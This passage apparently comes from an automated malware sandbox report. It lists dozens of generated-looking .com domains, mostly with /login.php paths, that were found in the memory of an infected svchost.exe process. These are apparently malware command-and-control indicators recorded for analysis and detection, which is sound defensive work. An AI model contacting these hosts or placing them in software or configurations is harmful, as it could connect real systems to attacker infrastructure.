    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583844692.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfoj.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643117669.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjix.com/login.php
    Source: svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550752582.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548763256.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562152424.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
    Source: svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylen.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymud.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysaj.com/login.php
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytan.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytud.com/
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2649652867.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytuj.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyvix.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxyj.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfar.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygud.com/login.php
    Source: svchost.exe, 00000002.00000003.1671559153.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090770576.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2091016673.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygur.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjaj.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084205455.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjod.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymin.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynej.com/login.php
    Source: svchost.exe, 00000002.00000003.2035294688.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034558504.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023797256.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2026757064.00000000029C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynir.com/H
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysun.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytur.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070332.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650606873.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywen.com/
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/login.php
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608032258.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxyd.com/login.php
    Source: svchost.exe, 00000002.00000003.1671559153.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycog.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799076487.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800862645.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525159477.0000000006006000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527597115.0000000006008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.php
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygug.com/
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygug.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/login.php
    Source: svchost.exe, 00000002.00000003.1580252694.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583844692.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579912316.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586377868.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585383980.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577080593.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586144218.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjuq.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853567914.0000000003A60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylap.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2038097652.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637675576.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638312778.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044633046.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044910027.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2041626370.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylul.com/login.php
